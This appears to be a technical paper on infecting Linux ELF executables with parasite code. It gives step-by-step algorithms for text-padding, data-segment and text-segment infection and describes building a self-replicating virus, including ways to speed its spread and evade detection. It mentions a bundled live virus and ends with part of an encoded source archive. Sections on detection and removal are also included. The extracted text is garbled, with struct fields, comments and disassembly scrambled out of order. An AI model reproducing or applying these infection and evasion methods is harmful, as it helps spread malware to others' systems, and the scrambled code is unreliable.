unsigned char Elf32_Half Elf32_Half Elf32_Word Elf32_Addr Elf32_Off Elf32_Off Elf32_Word Elf32_Half Elf32_Half Elf32_Half Elf32_Half Elf32_Half Elf32_Half } Elf32_Ehdr;

e_ident[EI_NIDENT]; e_type; e_machine; e_version; e_entry; e_phoff; e_shoff; e_flags; e_ehsize; e_phentsize; e_phnum; e_shentsize; e_shnum; e_shstrndx;

/* /* /* /* /* /* /* /* /* /* /* /* /* /*

Magic number and other info */ Object file type */ Architecture */ Object file version */ Entry point virtual address */ Program header table file offset */ Section header table file offset */ Processor-specific flags */ ELF header size in bytes */ Program header table entry size */ Program header table entry count */ Section header table entry size */ Section header table entry count */ Section header string table index */

e_entry is the entry point of the program given as a virtual address. For knowledge of the memory layout of the process image and the segments that compromise it stored in the ELF object see the Program Header information below. e_phoff gives use the file offset for the start of the program header table. Thus to read the header table (and the associated loadable segments), you may lseek to that position and read e_phnum*sizeof(Elf32_Pdr) bytes associated with the program header table. It can also be seen, that the section header table file offset is also given. It was previously mentioned that the section table resides at the end of

the file, so after inserting of data at the end of the segment on file, the offset must be updated to reflect the new position. /* Program segment header. */ typedef struct { Elf32_Word Elf32_Off Elf32_Addr Elf32_Addr Elf32_Word Elf32_Word Elf32_Word Elf32_Word } Elf32_Phdr;

p_type; p_offset; p_vaddr; p_paddr; p_filesz; p_memsz; p_flags; p_align;

/* /* /* /* /* /* /* /*

Segment Segment Segment Segment Segment Segment Segment Segment

type */ file offset */ virtual address */ physical address */ size in file */ size in memory */ flags */ alignment */

Loadable program segments (text/data) are identified in a program header by a p_type of PT_LOAD (1). Again as with the e_shoff in the ELF header, the file offset (p_offset) must be updated in later phdr's to reflect their new position in the file. p_vaddr identifies the virtual address of the start of the segment. As mentioned above regarding the entry point. It is now possible to identify where program flow begins, by using p_vaddr as the base index and calculating the offset to e_entry. p_filesz and p_memsz are the file sizes and memory sizes respectively that the segment occupies. The use of this scheme of using file and memory sizes, is that where its not necessary to load memory in the process from disk, you may still be able to say that you want the process image to occupy its memory. The .bss section (see below for section definitions), which is for uninitialized data in the data segment is one such case. It is not desirable that uninitialized data be stored in the file, but the process image must allocated enough memory. The .bss section resides at the end of the segment and any memory size past the end of the file size is assumed to be part of this section. /* Section header. */ typedef struct { Elf32_Word Elf32_Word Elf32_Word Elf32_Addr Elf32_Off Elf32_Word Elf32_Word Elf32_Word Elf32_Word Elf32_Word } Elf32_Shdr;

sh_name; sh_type; sh_flags; sh_addr; sh_offset; sh_size; sh_link; sh_info; sh_addralign; sh_entsize;

/* /* /* /* /* /* /* /* /* /*

Section name (string tbl index) */ Section type */ Section flags */ Section virtual addr at execution */ Section file offset */ Section size in bytes */ Link to another section */ Additional section information */ Section alignment */ Entry size if section holds table */

The sh_offset is the file offset that points to the actual section. The shdr should correlate to the segment its located it. It is highly suspicious if the vaddr of the section is different to what is in from the segments view.

THE TEXT SEGMENT PADDING VIRUS (PADDING INFECTION) The resulting segments after parasite insertion into text segment padding looks like this. key: [...] V T D P Page Nr #1 #2 ... After insertion of parasite code, the layout of the ELF file will look like this. ELF Header Program header table Segment 1 - The text segment of the host - The parasite Segment 2 Section header table Section 1 . . Section n Thus the parasite code must be physically inserted into the file, and the text segment extended to see the new code. To insert code at the end of the text segment thus leaves us with the following to do so far. * Increase p_shoff to account for the new code in the ELF header * Locate the text segment program header * Increase p_filesz to account for the new code * Increase p_memsz to account for the new code * For each phdr who's segment is after the insertion (text segment) * increase p_offset to reflect the new position after insertion * For each shdr who's section resides after the insertion * Increase sh_offset to account for the new code * Physically insert the new code into the file - text segment p_offset + p_filesz (original) There is one hitch however. Following the ELF specifications, p_vaddr and p_offset in the Phdr must be congruent together, to modulo the page size. key: ~= is denoting congruency. p_vaddr (mod PAGE_SIZE) ~= p_offset (mod PAGE_SIZE) This means, that any insertion of data at the end of the text segment on the file must be congruent modulo the page size. This does not mean, the text A complete page Parasite code Text Data Padding <- Text segment <- Data segment

[TTTTTTTTTTTTVVPP] [PPPPDDDDDDDDPPPP]

segment must be increased by such a number, only that the physical file be increased so. This also has an interesting side effect in that often a complete page must be used as padding because the required vaddr isn't available. The following may thus happen. key: [...] T D P Page Nr #1 #2 #3 A complete page Text Data Padding <- Text segment <- Padding <- Data segment

[TTTTTTTTTTTTPPPP] [PPPPPPPPPPPPPPPP] [PPPPDDDDDDDDPPPP]

This can be taken advantage off in that it gives the parasite code more space, such a spare page cannot be guaranteed. To take into account of the congruency of p_vaddr and p_offset, our algorithm is modified to appear as this. * Increase p_shoff by PAGE_SIZE in the ELF header * Locate the text segment program header * Increase p_filesz by account for the new code * Increase p_memsz to account for the new code * For each phdr who's segment is after the insertion (text segment) * increase p_offset by PAGE_SIZE * For each shdr who's section resides after the insertion * Increase sh_offset by PAGE_SIZE * Physically insert the new code and pad to PAGE_SIZE, into the file text segment p_offset + p_filesz (original) Now that the process image loads the new code into being, to run the new code before the host code is a simple matter of patching the ELF entry point and the virus jump to host code point. The new entry point is determined by the text segment v_addr + p_filesz (original) since all that is being done, is the new code is directly prepending the original host segment. For complete infection code then. * Increase p_shoff by PAGE_SIZE in the ELF header * Patch the insertion code (parasite) to jump to the entry point (original) * Locate the text segment program header * Modify the entry point of the ELF header to point to the new code (p_vaddr + p_filesz) * Increase p_filesz by account for the new code (parasite) * Increase p_memsz to account for the new code (parasite) * For each phdr who's segment is after the insertion (text segment) * increase p_offset by PAGE_SIZE * For each shdr who's section resides after the insertion * Increase sh_offset by PAGE_SIZE * Physically insert the new code (parasite) and pad to PAGE_SIZE, into the file - text segment p_offset + p_filesz (original) This, while perfectly functional, can arouse suspicion because the the new code at the end of the text segment isn't accounted for by any sections.

Its an easy matter to associate the entry point with a section however by extending its size, but the last section in the text segment is going to look suspicious. Associating the new code to a section must be done however as programs such as 'strip' use the section header tables and not the program headers. The final algorithm is using this information is. * Increase p_shoff by PAGE_SIZE in the ELF header * Patch the insertion code (parasite) to jump to the entry point (original) * Locate the text segment program header * Modify the entry point of the ELF header to point to the new code (p_vaddr + p_filesz) * Increase p_filesz by account for the new code (parasite) * Increase p_memsz to account for the new code (parasite) * For each phdr who's segment is after the insertion (text segment) * increase p_offset by PAGE_SIZE * For the last shdr in the text segment * increase sh_len by the parasite length * For each shdr who's section resides after the insertion * Increase sh_offset by PAGE_SIZE * Physically insert the new code (parasite) and pad to PAGE_SIZE, into the file - text segment p_offset + p_filesz (original) infect-elf-p is the supplied program (complete with source) that implements the elf infection using text segment padding as described. INFECTING INFECTIONS In the parasite described, infecting infections isn't a problem at all. By skipping executables that don't have enough padding for the parasite, this is solved implicitly. Multiple parasites may exist in the host, but their is a limit of how many depending on the size of the parasite code. THE DATA SEGMENT VIRUS (DATA INFECTION) The new method of ELF infection as briefly described in the last section means that the data segment is extended and the parasite is located in the new extended space. In x86 architecture, at least, code that is in the data segment may be executed. To extend the data segment means we simply have to extend the program header in the ELF executable. Note must be taken though, that the .bss section ends the data segment normally. This section is used for uninitialized data and occupies no file space but does occupy memory space. If we extend the data segment we have to leave space for the .bss section. The memory layout is as follows. original: [text] [data] parasite: [text] [data] [parasite] The algorithm for the data segment parasite is show below.

* Patch the insertion code (parasite) to jump to the entry point (original) * Locate the data segment * Modify the entry point of the ELF header to point to the new code (p_vaddr + p_memsz) * Increase p_filesz to account for the new code and .bss * Increase p_memsz to account for the new code * Find the length of the .bss section (p_memsz - p_filesz) * For each phdr who's segment is after the insertion (text segment) * increase p_offset to reflect the new position after insertion * For each shdr who's section resides after the insertion * Increase sh_offset to account for the new code * Physically insert the new code into the file The algorithm shown works for an ELF executable but the parasite inserted into the host becomes strip unsafe because no section matches the parasite. A new section could be created for this purpose to become strip safe again. This however has not been implemented. This type of virus is easy to spot if you know what your looking for. For starters no section matches the entry point and more suspect is the fact that the entry point is in the data segment. VIRUS DETECTION The detection of the data segment virus is extremely easy taking into account that the entry point of the ELF image is in the data segment not in the text segment. An implementation of a simple virus scanner is supplied. THE TEXT SEGMENT VIRUS (TEXT INFECTION) The text segment virus works under the premise that the text segment can be extended backwards and new parasite code can run in the extension. The memory layout is as follows. original: [text] [data] parasite: [parasite] (new start of text) [text] [data] The algorithm is as follows: * Patch the insertion code (parasite) to jump to the entry point (original) * Locate the text segment * For each phdr who's segment is after the insertion (text segment) * increase p_offset to reflect the new position after insertion * For each shdr who's section resides after the insertion * Increase sh_offset to account for the new code * Physically insert the new code into the file

INFECTION USING OBJECT CODE PARASITES It is often desireable not to use assembler for parasite code but use direct C code instead. This can make writing a pure C virus possible avoiding the messy steps of converting code to asm which require extra time and skill. This can be acheived through the use of relocatable or object code. Because we can't just extract an executeable image as the parasite image because the image is fixed at a certain memory location we can use a relocatable image and link into the desired location. OBJECT CODE LINKING ELF is the typical standard used to represent object code on Linux. The paper will thus only refer to linking using ELF objects. An object code file is referred to as relocatable code when using ELF because that summarizes what it is. It is not fixed to any memory position. It is the responsibility of linking that makes an executable image out of a relocatable object and binds symbols to addresses. Linking of code is done by relocating the code to a fixed positing. For the most part, the object code does not need to be changed heavily. Consider the following C code. #include <linux/unistd.h> #include <linux/types.h> static inline _syscall3(ssize_t, write, int, fd, const void *, buf, size_t, coun t); int main() { write(1, "INFECTED Host\n", 14); } The string 's' being part of the relocatable text section in the object has no known absolute position in memory at compile time. Likewise, printk, is an externally defined symbol and its address is also not known at compile time. Relocation sections in the ELF object are used for describing what needs to be modified (relocated) in the object. In the above case, relocation entries would be made for printk's reference and the string's reference. The format for an ELF relocatable object (object code) is as follows. ELF header Program header table Section 1 Section n Section header table >From the ELF specifications. "String Table

String table sections hold null-terminated character sequences, commonly called strings. The object file uses these strings to represent symbol and section names. One references a string as an index into the string table section. The first byte, which is index zero, is defined to hold a null character. Likewise, a string tables last byte is defined to hold a null character, ensuring null termination for all strings. A string whose index is zero specifies either no name or a null name, depending on the context. An empty string table section is permitted; its section headers sh_size member would contain zero. Non-zero indexes are invalid for an empty string table." . . . Symbol Table An object program's subscript table and entry are file's symbol table holds information needed to locate and relocate a symbolic definitions and references. A symbol table index is a into this array. Index 0 both designates the first entry in the serves as the undefined symbol index. The contents of the initial specified later in this section."

/* Symbol table entry. */ typedef struct { Elf32_Word Elf32_Addr Elf32_Word unsigned char unsigned char Elf32_Section } Elf32_Sym;

st_name; st_value; st_size; st_info; st_other; st_shndx; 0

/* /* /* /* /* /*

Symbol name (string tbl index) */ Symbol value */ Symbol size */ Symbol type and binding */ No defined meaning, 0 */ Section index */

#define SHN_UNDEF

/* No section, undefined symbol. */

/* How to extract and insert information held in the st_info field. */ #define ELF32_ST_TYPE(val) #define ELF32_ST_INFO(bind, type) ((val) & 0xf) (((bind) << 4) + ((type) & 0xf))

/* Legal values for ST_BIND subfield of st_info (symbol binding). */ #define #define #define #define #define #define STB_LOCAL STB_GLOBAL STB_WEAK STB_NUM STB_LOPROC STB_HIPROC 0 1 2 3 13 15 /* /* /* /* /* /* Local symbol */ Global symbol */ Weak symbol */ Number of defined types. */ Start of processor-specific */ End of processor-specific */

>From the ELF specifications. "A relocation section references two other sections: a symbol table and a section to modify. The section headers sh_info and sh_link members, described in ``Sections'' above, specify these relationships. Relocation entries for different object files have slightly different interpretations for the r_offset member. In relocatable files, r_offset holds a section offset. That is, the relocation

section itself describes how to modify another section in the file; relocation offsets designate a storage unit within the second section." >From /usr/include/elf.h /* Relocation table entry without addend (in section of type SHT_REL). */ typedef struct { Elf32_Addr r_offset; Elf32_Word r_info; } Elf32_Rel;

/* Address */ /* Relocation type and symbol index */

/* How to extract and insert information held in the r_info field. */ #define ELF32_R_SYM(val) #define ELF32_R_TYPE(val) #define ELF32_R_INFO(sym, type) ((val) >> 8) ((val) & 0xff) (((sym) << 8) + ((type) & 0xff))

These selected paragraphs and sections from the ELF specifications and header files give us a good high level concept of how a relocatable ELF file can be linked to produce an image capable of being executed. The process of linking the image is as follows. * * * * * Identify the file as being in relocatable ELF format Load each relevant section into memory For each PROGBITS section set the section address in memory For each REL (relocation) section, carry out the relocation Assemble the executable image by copying the sections into their respective positions in memory

The relocation step may be expanded into the following algorithm. * * * * * Evaluate the target section of the relocation entry Evaluate the symbol table section of the relocation entry Evaluate the location in the section that the relocation is to apply Evaluate the address of the symbol that is used in the relocation Apply the relocation

The actual relocation is best presented by looking at the source. For more information on the relocation types refer to the ELF specifications. Note that we ignore the global offset table completely and any relocation types of its nature. switch (ELF32_R_TYPE(rel->r_info)) { case R_386_NONE: break; case R_386_PLT32: case R_386_PC32: *loc -= dot; case R_386_32: *loc += addr; break; THE IMPLEMENTED INFECTOR The implemented infector must use C parasite code that avoids libc and uses

/* *loc += addr - dot

*/

Linux syscalls exclusively. This means that plt/got problems are avoided. Likewise the parasite code must end in the following asm: loop1: popl cmpl jne popl popl popl popl popl popl movl jmp %eax $0x22223333, %eax loop1 %edx %ecx %ebx %eax %esi %edi $0x11112222, %ebp *%ebp

This is so it can jump back to the host correctly. It uses a little trickery to do this properly. Why the popl loop? - well.. the jump back to host goes in _before_ the end of main, so there are still some variables to be pop'd back before your back to where you start. you don't know how many variables have been pushed, so a unique magic number is used to mark the start/end of it check the initcode in relocater.c. The movl $0x11112222,%ebp ? - well.. u don't know where abouts this jmp (back to host) is going to be in the code, so you substitute a unique magic number where you want the host entry point to go. Then you search the object code for the magic and replace. NON (NOT AS) TRIVIAL PARASITE CODE Parasite code that requires memory access requires the stack to be used manually naturally. No bss section can be used from within the virus code in the padding and text infectors because it can only use part of the text segment. It is strongly suggested that rodata not be used, in-fact, it is strongly suggested that no location specific data be used at all that resides outside the parasite at infection time. Thus, if initialized data is to be used, it is best to place it in the text segment, ie at the end of the parasite code - see below on calculating address locations of initialized data that is not known at compile/infection time. If the heap is to be used, then it will be operating system dependent. In Linux, this is done via the 'brk' syscall. The use of any shared library calls from within the parasite should be removed, to avoid any linking problems and to maintain a portable parasite in files that use varying libraries. It is thus naturally recommended to avoid using libc. Most importantly, the parasite code must be relocatable. It is possible to patch the parasite code before inserting it, however the cleanest approach is to write code that doesn't need to be patched. In x86 Linux, some syscalls require the use of an absolute address pointing to initialized data. This can be made relocatable by using a common trick used in buffer overflow code. jmp B: pop %eax . ; %eax now has the address of the string ; continue as usual A

. . A: call B .string \"hello\" By making a call directly proceeding the string of interest, the address of the string is pushed onto the stack as the return address. BEYOND ELF PARASITES AND ENTER VIRUS IN UNIX In a UNIX environment the most probably method for a typical garden variety virus to spread is through infecting files that it has legal permission to do so. A simple method of locating new files possible to infect, is by scanning the current directory for writable files. This has the advantage of being relatively fast (in comparison to large tree walks) but finds only a small percentage of infect-able files. Directory searches are however very slow irrespectively, even without large tree walks. If parasite code does not fork, its very quickly noticed what is happening. In the sample virus supplied, only a small random set of files in the current directory are searched. Forking, as mentioned, easily solves the problem of slowing the startup to the host code, however new processes on the system can be spotted as abnormal if careful observation is used. The parasite code as mentioned, must be completely written in machine code, this does not however mean that development must be done like this. Development can easily be done in a high level language such as C and then compiled to asm to be used as parasite code. A bootstrap process can be used for initial infection of the virus into a host program that can then be distributed. That is, the ELF infector code is used, with the virus as the parasite code to be inserted. THE LINUX PARASITE VIRUS This virus implements the ELF infection described by utilizing the padding at the end of the text segment. In this padding, the virus in its entirety is copied, and the appropriate entry points patched. At the end of the parasite code, are the instructions. movl jmp %ebp, $XXXX *%ebp

XXXX is patched when the virus replicates to the host entry point. This approach does have the side effect of trashing the ebp register which may or may not be destructive to programs who's entry points depend on ebp being set on entry. In practice, I have not seen this happen (the implemented Linux virus uses the ebp approach), but extensive replicating has not been performed. On execution of an infected host, the virus will copy the parasite (virus) code contained in itself (the file) into memory. The virus will then scan randomly (random enough for this instance) through

the current directory, looking for ELF files of type ET_EXEC or ET_DYN to infect. It will infect up to Y_INFECT files, and scan up to N_INFECT files in total. If a file can be infected, ie, its of the correct ELF type, and the padding can sustain the virus, a a modified copy of the file incorporating the virus is made. It then renames the copy to the file its infecting, and thus it is infected. Due to the rather large size of the virus in comparison to the page size (approx 2.3k) not all files are able to be infected, in fact only near half on average. DEVELOPMENT OF THE LINUX VIRUS The Linux virus was completely written in C, and strongly based around the ELF infector code. The C code is supplied as elf-p-virus.c The code requires the use of no libraries, and avoids libc by using a similar scheme to the _syscall declarations Linux employs modified not to use errno. Heap memory was used for dynamic allocation of the phdr and shdr tables using 'brk'. Linux has some syscalls which require the address of initialized strings to be passed to it, notably, open, rename, and unlink. This requires initialized data storage. As stated before, rodata cannot be used, so this data was placed at the end of the code. Making it relocatable required the use of the above mentioned algorithm of using call to push the address (return value) onto the stack. To assist in the asm conversion, extra variables were declared so to leave room on the stack to store the addresses as in some cases the address was used more than once. The C code form of the virus allowed for a debugging version which produces verbose output, and allows argv[0] to be given as argv[1]. This is advantageous because you can setup a pseudo infected host which is non replicating. Then run the virus making argv[0] the name of the pseudo infected host. It would replicate the parasite from that host. Thus it was possible to test without having a binary version of a replicating virus. The C code was converted to asm using the c produce assembler. Modifications were made initialized data (strings for open, unlink, the relocatable data using the call address compiler gcc, with the -S flag to so that use of rodata for and rename), was replaced with methodology.

Most of the registers were saved on virus startup and restored on exit (transference of control to host). The asm version of the virus, can be improved tremendously in regards to efficiency, which will in turn improve the expected life time and replication of the virus (a smaller virus can infect more objects, where previously the padding would dictate the larger virus couldn't infect it). The asm virus was written with development time the primary concern and hence almost zero time was spent on hand optimization of the code gcc generated from the C version. In actual fact, less than 5 minutes were spent in asm editing - this is indicative that extensive asm specific skills are not required for a non optmised virus. The edited asm code was compiled (elf-p-virus-egg.c), and then using objdump with the -D flag, the addresses of the parasite start, the required offsets for patching were recorded. The asm was then edited again using the new

information. The executable produced was then patched manually for any bytes needed. elf-text2egg was used to extract hex-codes for the complete length of the parasite code usable in a C program, ala the ELF infector code. The ELF infector was then recompiled using the virus parasite. # objdump -D elf-p-virus-egg . . 08048143 <time>: 8048143: 55 . . 08048793 <main0>: 8048793: 55 . . 80487f8: 6a 00 80487fa: 68 7e 00 00 00 80487ff: 56 8048800: e8 2e fa ff ff . . 80489ef: bd 00 00 00 00 80489f4: ff e5

pushl %ebp

pushl %ebp pushl pushl pushl call movl jmp $0x0 $0x7e %esi 8048233 <lseek> $0x0,%ebp *%ebp 804884b <dot_call> %ch,%al 8048354 <tmp_call> 8048a6e <init+0x4e> (%edx),%esi $0x2e,%al 8048a78 <init+0x58> 8048a0d <tmp_jump+0x10>

080489f6 <dot_jump>: 80489f6: e8 50 fe ff ff call 80489fb: 2e 00 e8 addb 080489fd <tmp_jump>: 80489fd: e8 52 f9 ff ff call 8048a02: 2e 76 69 jbe 8048a05: 33 32 xorl 8048a07: 34 2e xorb 8048a09: 74 6d je 8048a0b: 70 00 jo 0x8048143 0x8048793 0x80487fb 0x80489f0 0x8048a0d 0x8048a0d 0x8048793 0x80487fb 0x80489f0

specifies the start of the parasite (time). is the entry point (main0). is the lseek offset which is the offset in argv[0] to the parasite. is the host entry point. is the end of the parasite (not inclusive). 0x8048143 0x8048143 0x8048143 0x8048143 (2250)is the parasite length. (1616) is the entry point as a parasite offset. (1720) is the seek offset as a parasite offset. (2221) is the host entry point as a parasite offset.

# objdump --all-headers elf-p-virus-egg . . Program Header: LOAD off 0x00000000 vaddr 0x08048000 paddr 0x08048000 align 2**12 filesz 0x00015960 memsz 0x00015960 flags r-x . . The seek offset as a file offset is 0x80487fb - 0x08048000 + 0x00000000 (2043) (<seek address from above> - <vaddr> + <off>)

To patch the initial seek offset, an infection must be manually performed, and the offset recorded. The infected host is not functional in this form. # infect-elf-p host Parasite length: 2251, Host entry point index: 2221, Entry point offset: 1616 Host entry point: 0x8048074 Padding length: 3970 New entry point: 0x80486ce Parasite file offset: 126 Infection Done # vpatch elf-p-virus-egg 2043 126 The supplied program elf-egg2text will convert the address range specified on the command line, and found using the ELF loadable segments in the file to a hex string for use in C. usage: elf-egg2text filename start stop # elf-egg2text elf-p-virus-egg 0x08048143 0x8048a0d > parasite-v.c parasite-v.c was edited manually to declare the hex string as the variabled char parasite[], and likewise these variables were declared. long hentry = 2221; long entry = 1616; int plength = 2250; The infector was recompiled and thus can infect the host it was compiled for making it a live virus. null-carrier is the supplied host program that the infector is compiled for. This completed the manual infection of the virus to a host. The newly infected host would then attempt replication on execution. A live virus has been included in the source package (live-virus-be-warned). A simplified carrier program (carrier.S) was used to host the virus (null-carrier is the uninfected host as stated). IMPROVING THE LINUX VIRUS The first major change that would increase the life time and replication rates of the virus is to optimise the code to be space efficient. Looking at a 50% size decrease is probably realistic when optimised. The replication is notable rather slow scanning only the current directory. The virus may be modified to do small tree walks increasing infection rates dramatically. The virus is easily detected - see below. VIRUS DETECTION The virus described is relatively easy to detect. The blatant oddity is that the entry point of the program isn't in a normal section or not in a section at all. Typically the last section in the text segment is .rodata which obviously shouldn't be the entry point. Likewise, it is suspicious if a program does not have a corresponding section then this arouses any would be virus scanner. Also if no section table at all, which will disguise what section the entry point is in, is certainly an odd event (even though this is optional).

Removal of the virus described here, is similar to infection, requiring deletion of the virus code, modification of the ELF headers to reflect segment relocation in the file and patching of the entry point to jump to the proper code. Location of the correct entry point can be easily seen by disassembling the executable using objdump, matching the entry point of the infected file to the disassembled code, and tracing through the code to find where the parasite code returns flow back to the host. $ objdump --all-headers host >host: file format elf32-i386 >host >architecture: i386, flags 0x00000112: >EXEC_P, HAS_SYMS, D_PAGED >start address 0x08048522 . . The entry point is thus seen as 0x08048522, the entry point of the suspected parasite code. $ disassemble --disassemble-all host >host: file format elf32-i386 > >Disassembly of section .interp: > >080480d4 <.interp>: > 80480d4: 2f das > 80480d5: 6c insb . . >Disassembly of section .text: > >08048400 <_start>: > 8048400: 31 ed > 8048402: 85 d2 > 8048404: 74 07 . . >Disassembly of section .rodata: > >0804851c <.rodata>: > 804851c: 48 > 804851d: 6f > 804851e: 73 74 > 8048520: 0a 00 > 8048522: b8 00 84 04 08 > 8048527: ff e0 > ... >Disassembly of section .data: # a parasite infected host

(%dx),%es:(%edi)

xorl %ebp,%ebp testl %edx,%edx je 804840d <_start+0xd>

decl outsl jae orb movl jmp

%eax %ds:(%esi),(%dx) 8048594 <_fini+0x94> (%eax),%al $0x8048400,%eax *%eax

. . Looking at the entry point code, which looks obviously to be parasite code since its residing in the .rodata section, we have. movl jmp $0x8048400,%eax *%eax

This code is easily seen to be jumping to _start, the original host code. # entry host 0x808400 The parasite code is thus easily removed from program flow by patching the entry point to skip the parasite code. On occasion no section matches the parasite code and hence the entry point. objdump will only disassemble sections so thus we can't see the parasite code as is. However, gdb can be used to disassemble manually, and the same method of manually finding the host entry point can be used as above. Automated virus detection of these variety of UNIX virus is practical by detecting missing section headers and/or entry points to non permissible sections or segments. Typically, the default entry point is _start, however this can be changed in linking. If a virus has been found in a file, and the host entry point is indeterminable for any reason, it may be beneficial to patch the entry point to _start. This however is still guesswork and not totally reliable. Typical general virus detection algorithms are directly applicable in UNIX, including signature strings, code flagging, file integrity checking etc. EVADING VIRUS DETECTION IN ELF INFECTION The major problem in terms of evading detection with the parasite described, is that the entry point changes to a suspicious position. Ideally, the entry point of the program either wouldn't change or stay within expected sections. A possible method using the parasite described would be to find unused memory in normal entry point sections such as the .text section, and insert code to jump to the parasite code. This would require only a small number of bytes, and such empty space is common, as can be noted by looking through disassembly of executables. Alternatively, one of the original ideas of where to insert the parasite code, thrown away, by extending the text segment backwards may be possible. The parasite code and entry point would belong in the .text section and thus seemingly be quite normal. CONCLUSION The algorithms and implementation presented gives a clear example and proof of concept that UNIX while not popular for, is actually a viable breeding ground for parasites and virus. -- cut begin 644 unix-viruses-src.tgz

M'XL(`"A__S<``^U]:XR<UW78ZF&%,U!+I?&/-`F"3RN+GB%G5_/>F5U1"46N M9")\:9>B+'.9Z3R^V1UR=F8R,[M<6F(L@V(;8LVZ*&K`+1JT0)$B19M?A6"W M@0(_TBHH7"=%$\"MT]8%G(*I#=0M@E:.%;/GG/N^W_WFL9Q=*?9\TG)F[N/< M<\\]Y]QSS[W?N5NMQL[<=J.[U?-[<[UN]9F9R3]>-KF0RWDS'CY)ZY/_\/(+ M"POPETWG/2^5SF33,UYN'W`)/%N]?KGK>3/==KL_J-RP_+^DSY8]_F?+U_QZ MH^E/L(U4,IG/9D/'/YW,IL3XY_+I+(P_,`R,?W*".(0^/^;C?_*D=]Q;KU:C M)U\X<^+%5?@Q=S[MS=7;FXW^7+U;WO3G.NU&J^]WO;EU[REO[I5RLQD]>6;Y MQ+D73I]9A@J11JON5_MS?K,^U_'H7\90<S6_LK7N;7?*_>J&D>&OKWMKT4A$ M3VNU67%,\UO][@WZUO=W^FDLKA6=[U'EUE:S.5<M=[L-OQN-`E:+H9CH.#A@ M2R!ZZF)$_S5?C48^$CMY,N[!OT2IN&?F>W-M[R._R&!0&PP`?0VKS3-%58;E M8H1]NBJ)'%%#[_!BI%/NEGN-O@_Y>H8+4&A1O1N<>HOZ.+F`S9TZM?S\RR\: M8T2``LP@ZA(7,4X#\>LWJLA<`ZMS]A@`8-4$$(T^%:EV++ZQF!!+64E&9^>, MD:?66+OKLME`:4%`SE2+$?YE?E7":;5[_5JS4?%D%E8R^9F0UY.\9F/;YPU5 M_+GKY6[+KT&Q^6<,K@\I5=W8;-=`YSJSH]6F7VXM1B/=39!\'%@IWO'H^ZV@ MIL^^/H'YO^LWV]4RZ/OYZJ3:&#S_IQ?RJ07+_LOFT\GI_'\0SU.-5K6Y5?.] M9T$G-=KS&\]%C2104V8:,`PD6^5N])Y!?1A,[=_H^#T;:+?16C?3ZM56OVDF M@3HS$];]?KM#342?JH&)VO*]LR=>/'VRM'SNXLJKD>1."IXT/-$HU\U@MGA^ MM]ON@E637-)3NULMEE;=@,%OM!K]*LPOEZ]`8C0RN[:36YB-1"+/'(UTMGH; M3<][VJ\U(I&CS[#,O)W9TS*3=F9Y1V5F[,R*EIFR,ZM:9CJ`D,K,%]9V,AGV MET[CWZQ6]"/)':1*!AY1H5);VTDF];]9SX,:F^WM)I9/)A"UCFR@7E_;\7.S MGO$\<]2+;':\H[+D$A*^NU7M>R68;+::OO=:-++<K&?2I>6-6C?BPS]+(F45 M?AR-]%C25JO76(>9R&NV6^N1S7*-4F&@(I&FWQ)?`7B_7&G4=B`!Q^WH44B# MF:_1AB(WH74.^<:F=Q1U6+/4N[%9`D:IQ62KF`>I`"=!C-!*>,0"1QEP^-5N M]?H\K076;S0>?8W:]QK00J0.S!1K$.]X#>]9KP4?QX[%L:>11MV+/0EPJIN= MV!$&[S)KZW+CRGRO7T)X5Q(>?L3C4"'2]?M;W99W1):"GMV$5GCZN9?/G(&> M!3L&-HCJFT7SH^PSV!/JB-Y9Z`4K._<<)^-E^5N0^LK2@,Z+TCBP\WZIM]': MVM3HH08:6L1_CWM'9`/PF_K+Z8:_,;6$"L,[?MQ;_=C%TNJK9R^>>)X!LP:0 M*D;@"P`-C#4\,:UXW.YEXTJ""LE&>XU/^L_@/^VZJACGA1ACT'=B"/B,+^&_ MA#<T\.1Q&JFXQX>-T(O`0#K'<KO=J,&H^-5K?,1"!Q#I7J_1L"DI\H[Z%BF9 M6$4)G:Y?KL7JM82'B0F/=XFJQ..(J)6"E.V0BHS-8MU9ZIF_T^C'4G'&C"#F MRV=>8!CW/!!SUA(@W4)&]XF&?JE1@\5,`HN"4DYXJ^P+;Z+>`97?KT.E&C26 M\&9?:$!'6^T^EE]K.5JE-@1LX@E`?OEB:67Y3`A(1)(*$E@J.1SR9KFZ@1,) M`C];RA3RWI$CGCLS6\@/:%F451@P<"`QK.YP7+;];@^XDYJ[5#KY\LH*3&P# MFA3EL;7J5K<+]'<U(EBNV2[72EP"8DP-'.T()H.!LX25J3U`K]GS_6O$4U)< MVO5ZS^_C("__4FEU&9!\UDN:S$2U7#T^V@'>Y>W'-T&1M:LQ0PZQ(+:+!85@ MZ9!9G3!B2@'`OIEPB?W-E.'L;U!O[_)J3'N,P$M"&1_E@]+AJK8GISRF=0U= M(=J"=C#/K0LB",*3PJY:CA\5S,9T-4#0%3*.C(ZF'!\`)X;%+#_>`%EZ6#&" M:HEA+%)-=`,H"##CLXEB:M4"</6>6%K80P;[Z61*T)`R_J,OKT4]Z[&9T,Z7 M#8J$FV(ZQOD39V1HA+-1<%IGDJ"G,S:)X"1N<00D'CNF@!T[%HTP,O2N-]"% M9L[4+*M:[ODT8>,P+!H)YR\N6PG/G[ZXBDF1"G3V&LWC,G?UX@I,^)1KJ"N! M3<(3>DC-P`VDJ^H$SDNU';*N(@%K!DC06`IKFXP-`]D+*^=?%.C*1)A71D=0 MM0,KEO)6LT]5A3KG]@7I=/H^>Z[M;91;M:;?]7!T!8?'B-:+WM,-T/"6[8)9 MRB91G$F\'CEVC(^U4F5B@1^JQY@*6/&;WE$H&S(U!.QI37DXC2Z)<+/1NG9E MR8:`6HR;P3"Y8?LX(B!0S;GGNJ5&J]Z.JTHG8('@\56"CAVLY->=EJ9L'`%9 M<&HP?Q[W/%&7BB%L[YC'6V?SG5D+#7'59984QQ$-[3<U;0.-TK@I(]W`/-0H MQV4%_F8K"F'\,;JM7BP]?_K<J9@H0J1#&5F]^'SIS/F3)X2B9#PXN[RR<GYE MT5O>Z?O=5KF)UFNEW01>ZR&OL<4*LA.S8X/JE$AUW!/-;9>;6S[TTB0_SP0= M`]C/<P(#WD\UZB`8'KF/HQ*E54+!BSW=6WRZN1/W&CUFXTN$$E[,6#+&$1P@ M])3?JC7JG!S&@+J6%;)'[M)/'C>4@&F)14W)G45I04-,E$;#C[7#A!=E-RZ$ M-]!6E(NO25FA<84\7'SUPK(A$(02*:85-#9!N9XC;2NUCI9WX<S%3'K13#I) M*1%BY;GC*`A+$3#WZ?>QXR1@WAPF1\CLUZIJ%7G!);U=3=DY".;9:FZ%:213 